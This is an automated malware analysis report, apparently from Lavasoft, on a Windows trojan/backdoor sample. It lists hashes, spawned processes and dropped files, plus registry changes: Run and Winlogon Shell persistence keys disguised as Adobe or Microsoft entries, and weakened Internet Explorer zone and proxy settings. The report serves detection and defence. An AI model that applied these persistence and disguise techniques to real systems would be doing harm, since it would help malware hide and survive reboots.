Skip to main content

Trojan.Generic.11523736_26eb2a1694


HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Generic.11523736 (B) (Emsisoft), Trojan.Generic.11523736 (AdAware), Backdoor.Win32.Farfli.FD, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 26eb2a1694323fc21c7c2448c08874d0

SHA1: 62461fda74be31b667a58bc9ca30e26066ce42b7

SHA256: 107a36254acb827f9c8e8198bb1684069b88f367c54c25fa6bacaf709f9fc580

SSDeep: 98304:v3v 74YeXX6NpGIPwrUwj2R/EX/ /hN40kpF :vf 0/XqNkCz/EW54p8

Size: 4305920 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2010-03-07 18:08:39

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

TEST3.EXE:1688
WUPDATE.EXE:960
TEST.EXE:640
TEST2.EXE:1636
WINUPDATE.EXE:560
WINUPDATE.EXE:1984
%original file name%.exe:1504
OPENGL.EXE:2008
CRYPT.EXE:1552
HSCB.EXE:952

The Trojan injects its code into the following process(es):

HIDDEN SIGHT.EXE:1944
OPENGL.EXE:1300
svchost.exe:1368

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process TEST3.EXE:1688 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\TEST2.EXE (15801 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OPENGL.EXE (13 bytes)

The process TEST.EXE:640 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CRYPT.EXE (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HSCB.EXE (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WINUPDATE.EXE (186 bytes)

The process TEST2.EXE:1636 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\WUPDATE.EXE (83 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TEST.EXE (15021 bytes)

The process WINUPDATE.EXE:560 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\OPENGL.EXE (246 bytes)

The process WINUPDATE.EXE:1984 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\winlogon.exe (7547 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\winlogon.exe (0 bytes)

The process %original file name%.exe:1504 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\winlogon.exe (31071 bytes)

The process OPENGL.EXE:1300 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

The process CRYPT.EXE:1552 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\HeciServer.exe (7433 bytes)

The process HSCB.EXE:952 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\HIDDEN SIGHT.EXE (7386 bytes)

Registry activity

The process TEST3.EXE:1688 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 92 ED 02 32 46 B0 A6 CF F1 B8 96 FD 0D 16 27"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"OPENGL.EXE" = "OPENGL"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"test2.exe" = "TEST2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process HIDDEN SIGHT.EXE:1944 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 3B 48 42 1E 9E C2 D2 29 34 2C B1 C9 83 E3 2B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process WUPDATE.EXE:960 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\S-1-5-21-1844237615-1960408961-1801674531-500\Software\WinRAR]
"HWID" = "7B 34 34 37 46 33 38 31 43 2D 36 37 33 45 2D 34"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKU\S-1-5-21-1844237615-1960408961-1801674531-500\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\S-1-5-21-1844237615-1960408961-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\Administrator\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 F6 A7 35 9A F9 AA 1C F1 55 B1 47 6A 48 00 2B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\S-1-5-21-1844237615-1960408961-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\Administrator\Local Settings\Application Data"

[HKCU\Software\WinRAR]
"HWID" = "7B 35 31 34 37 33 45 42 32 2D 45 46 35 41 2D 34"

The process TEST.EXE:640 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 6B 07 3F 0A 9B 34 4F 70 16 3F AB ED 22 66 52"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"HSCB.EXE" = "HSCB"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"CRYPT.EXE" = "CRYPT"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process TEST2.EXE:1636 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 9C 73 6E E4 9A 68 63 99 DA 58 7F 7B 6C 64 68"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"test.exe" = "TEST"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"wupdate.exe" = "WUPDATE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process WINUPDATE.EXE:560 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 3A CA B0 5C 6D 51 B9 88 A3 1A 7B 71 F6 2A 42"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process WINUPDATE.EXE:1984 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 49 3B 43 C2 33 F2 A0 F4 47 8B F4 54 3E 40 F8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"Adobe Flash Player" = "%AppData%\Microsoft\winlogon.exe"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "%AppData%\Microsoft\winlogon.exe,explorer.exe"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Adobe Flash Player" = "%AppData%\Microsoft\winlogon.exe"

The process %original file name%.exe:1504 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E 53 75 94 9C D4 04 CB 5C 18 89 93 55 7A AD ED"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"Adobe Reader" = "%AppData%\Microsoft\winlogon.exe"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "%AppData%\Microsoft\winlogon.exe,explorer.exe"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader" = "%AppData%\Microsoft\winlogon.exe"

The process OPENGL.EXE:1300 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080120140802]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014080120140802\"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080120140802]
"CacheOptions" = "11"
"CacheRepair" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080120140802]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 75 D5 55 04 97 81 73 5B 0E 8F 4B B1 A3 61 F2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080120140802]
"CachePrefix" = ":2014080120140802:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process CRYPT.EXE:1552 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 4C 34 7F 56 AE C3 DD D0 6B 35 8F 52 40 B4 30"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"Microsoft(R) Delayed Launcher" = "%AppData%\Microsoft\HeciServer.exe"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "%AppData%\Microsoft\HeciServer.exe,explorer.exe"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft(R) Delayed Launcher" = "%AppData%\Microsoft\HeciServer.exe"

The process HSCB.EXE:952 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 75 42 BC 74 B9 80 45 C3 10 03 77 28 4F DB 18"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"HIDDEN SIGHT.EXE" = "| Hidden Sight |"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5 File path
94a20be0aca341f670175ad7b30cdb70c:\Documents and Settings\"%CurrentUserName%"\Application Data\Microsoft\HeciServer.exe
